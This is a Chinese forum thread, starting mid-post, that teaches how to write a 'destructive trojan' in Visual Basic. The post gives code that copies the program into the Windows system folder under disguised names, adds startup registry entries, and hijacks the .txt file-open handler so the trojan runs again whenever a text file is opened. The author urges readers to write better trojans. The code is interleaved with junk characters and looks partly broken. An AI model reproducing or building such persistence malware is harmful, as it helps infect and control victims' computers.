发新话题
打印

用VB编写攻击性木马

本主题由 admin 于 2007-12-29 19:51 移动

用VB编写攻击性木马

result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1)
( M7 A9 D! h, i3 V' |* `End If 3 B  V5 o* @+ G3 D0 V
End Sub
, r5 n9 x9 c; S; r, Z" i  `好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:
6 i- G! }4 ^% w: j- F
) ~0 }! Z" S" j5 O* ]9 x8 M3 q4 K/ Z; T9 f) z5 R: ?
Public Sub WriteToTxt(), Z' r' T' }% Z8 U
Dim result As Long/ D3 C& S  Q* D: C0 k1 f2 L8 c# e8 W
Dim hKeyID As Long
3 h5 X. p5 C4 Z5 |' t8 c& X' PDim skey As String) n- ]  W6 K  J* R- P! J4 J
Dim skeyVal As String9 }* g0 w. F! r$ K: w* @
skey = "txtfile/shell/open/command"
% ]$ X! k" E5 lskeyVal = "C:/windows/system/txtView.exe"
7 G8 G/ ]+ g; }: c" R( Vresult = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)2 e8 ~& g2 y( i) n6 ^3 K7 v
If result = 0 Then& `% h0 T" ^1 }$ V" @/ @
result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)# t% i0 K2 z0 o7 g& t4 R
End If, N. w5 [" G: M/ B6 t
End Sub
# U: S6 R% m. ~  i# T  ~) v" t! h; g5 _; y- H0 r
" c2 @- R2 z: d  Y, z$ P% U3 t2 d
肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/
) x. [& G" ?# R6 a* O
( ?1 T& ^/ s4 c5 M4 a" T* {txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。
2 A' P: t, E2 w. ~- \6 ]) t# c2 P9 i# _
好,回到Server工程的Server窗体的form_Load中,加入如下代码: # j0 L& A9 f0 b. X% c5 u- Y1 a3 |% t

0 L& d8 x) `3 G4 w$ T
7 M7 g7 [% p; v" qDim sCurrentPath As String, sSystemDir As String
5 m3 E) v1 \& U7 ?- B8 b: K. p% @8 K7 |4 E" h. n* f
sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
. k' A2 Y1 V% G+ e: z. P: EsSystemDir = “C:/windows/system”
- K4 O( T4 Z) Y  u. J. @On Error Resume Next
" A% [7 V/ c" Z' L% ^& W'复制文件成系统目录下的Systrsy.exe! U# j( ?7 H7 [) |4 L3 g+ _
FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe"
) N/ h! ~6 q5 e* K- `0 U" FOn Error Resume Next# w$ [/ X/ B/ n/ e
复制文件成系统目录下的txtView.exe/ _# S5 ]5 _7 e6 s  m7 u( R1 H/ t
FileCopy sCurrentPath, sSystemDir & "/txtView.exe"9 x: G% Y* z( e+ t
调用! ~  D1 C  ^+ Y
Call startupGroup- v1 ^3 {" ?) K6 M
Call WriteToTxt# [% X5 d8 w1 c
'判断程序是否下在运行1 A" f# S# e; H  R2 x, p! @/ Y
If App.PrevInstance Then7 @* O: n& X1 A) S" [0 N8 M2 i& J
'如果已经运行就退出。
: w* b0 q5 z1 S# d: ~End( j5 H' \6 e" Z9 _1 f% l% X" z
End If
# ^( w: {+ _# I  `, C$ u7 M* T- p1 l$ g/ G

8 U) f5 l: F4 e& E) c8 f好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河。 " _9 C- D, }5 U

! E3 y6 B% e& ]% ^3 C2 U3 }% T注意:
2 a9 D4 Q/ `1 ]( f1 j
# y( L# Z6 i% i! x2 ~+ ]/ t! D& r1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突。
7 w, N: f0 }! q' g) i  r0 \3 d7 s7 ]! k  d6 n
2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定。

TOP

超级木马我是写不出来的,别中木马就好了/

TOP

引用: ' ^4 m) v: n' U( ~- D' O
超级木马我是写不出来的,别中木马就好了/
! |. z" B! u7 L: ?7 u- h. H/ @: c) u" T

3 X& H9 H. N) f" ?2 g. o4 r8 M- _- \! x/ y
re:re:用VB编写攻击性木马_[点击查看原图]

TOP

引用:
/ _; z# w9 z* M  x- ^  H超级木马我是写不出来的,别中木马就好了/

TOP

55555555555555555555555欺负银,看8懂。。。。。。

TOP

引用:
* c* Y. j6 Q- N! c  G0 B超级木马我是写不出来的,别中木马就好了/

TOP

引用:
2 u3 x. i4 e! d* z( A; v$ Z2 M' R" z超级木马我是写不出来的,别中木马就好了/
3 N$ ]' @: s' W哦,慰问下把。。

TOP

引用: ) S) Q" J6 H, `
超级木马我是写不出来的,别中木马就好了/! |7 f7 M* A4 d% R1 N
哦就最怕中拉

TOP

超级木马我是写不出来的,别中木马就好了/

TOP

可以充当骇客呢!

TOP

发新话题